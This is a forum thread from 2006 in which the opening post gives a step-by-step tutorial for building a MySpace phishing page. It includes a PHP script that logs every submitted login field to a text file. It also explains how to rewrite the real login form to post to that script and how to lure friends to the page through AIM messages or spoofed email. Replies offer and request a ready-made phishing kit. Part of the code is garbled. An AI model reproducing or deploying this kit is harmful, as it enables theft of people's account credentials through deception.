ThyElite Forums  
Go Back   ThyElite Forums > General > General Talk
Reload this Page Myspace Phisher
Reply
 
Thread Tools Display Modes
(#1)
Old
MYMOMMAGOTBEEF is Offline
Lots o' Posts
MYMOMMAGOTBEEF is on a distinguished road
 
Posts: 471
Join Date: Jul 2006
Location: MN
Send a message via AIM to MYMOMMAGOTBEEF
Default Myspace Phisher - 10-28-2006, 01:41 PM

I found a myspace phisher tutorial. If you have no clue in coding or setting up a website then don't try.


1. Decide who and where you want to get into. When I did this myself, I was trying to get into all of my friend's MySpace accounts. Then go to the website you chose, right-click, and View Source.

2. Save the source as login.html. Then open Notepad and paste the following into it:


foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;


Save as data.txt

3. Register at a free webhosting place that will let you use php. (I used 100webspace.com) Then register at a place that won't display advertisements on your site. (I used 50webs.com) It would be a good idea to try to login to the website your making a fake of but with a bad password. Copy the link for the error page.

4. Get a program that will let you save as .php (I used EditPlus2 from http://www.editplus.com) Open the program then copy and paste the following:


<?php
header("Location: someplace.html");
$handle = fopen("data.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>


Now, look at the second line of code. Do you notice '("Location: someplace.html")'? Change someplace.html to the error page. Save as log.php

5. Upload data.txt and log.php at the site that will let you use php. (100webspace.com) Then open login.html in Notepad.
Search for <form action="some file name"> Replace their file name with a link to your log.php.
Save and then upload login.html.

6. Test out your new login page. Load your data.txt from your website(yoururl.hostdomain/data.txt) and it should have your test login listed. You can re-uplod data.txt to get rid of your test login information.

Ok now that you have your fake login page done you need to get the people there. The method I chose to do was to make the page different and tell people it was a secret login page. I put it in my away message on AIM and told them if they logged in at that page they would see something cool. Another way is to spoof an email.



[Made By Xplogen, Thanks ]
Reply With Quote
(#2)
Old
boner2191 is Offline
Master of the Post
boner2191 is on a distinguished road
 
Posts: 304
Join Date: Jun 2006
Default 10-28-2006, 01:57 PM

i have one if any one really wants it. all you need to is host it some where.
Reply With Quote
(#3)
Old
MYMOMMAGOTBEEF is Offline
Lots o' Posts
MYMOMMAGOTBEEF is on a distinguished road
 
Posts: 471
Join Date: Jul 2006
Location: MN
Send a message via AIM to MYMOMMAGOTBEEF
Default 10-28-2006, 02:41 PM

Hmm. Ill take it. I've got places where I can host it.



[Made By Xplogen, Thanks ]
Reply With Quote
(#4)
Old
Remake is Offline
Veteran Member
Remake is on a distinguished road
 
Posts: 91
Join Date: Jul 2006
Location: Brooklyn
Send a message via AIM to Remake
Default 10-29-2006, 01:15 PM

i want it


Reply With Quote
(#5)
Old
Matt_Hardy is Offline
Spamzilla
Matt_Hardy is on a distinguished road
 
Posts: 988
Join Date: Jun 2006
Location: United Kingdom
Send a message via AIM to Matt_Hardy Send a message via MSN to Matt_Hardy Send a message via Yahoo to Matt_Hardy
Default 10-29-2006, 01:25 PM

So does this do anything to my myspace then as i want a change?
Reply With Quote
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Habbo Hotel Phisher (fake login) X0G Habbo Downloads 12 10-09-2006 09:42 AM
Need Help with the VMK Phisher thing nellygrl Help! 0 08-24-2006 11:41 PM
Myspace ZeRoZX524 General Talk 3 08-24-2006 01:24 AM
Myspace nick General Talk 26 08-06-2006 08:36 PM
Myspace hacking CubsRule62592 Requests 0 07-29-2006 11:17 AM



Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.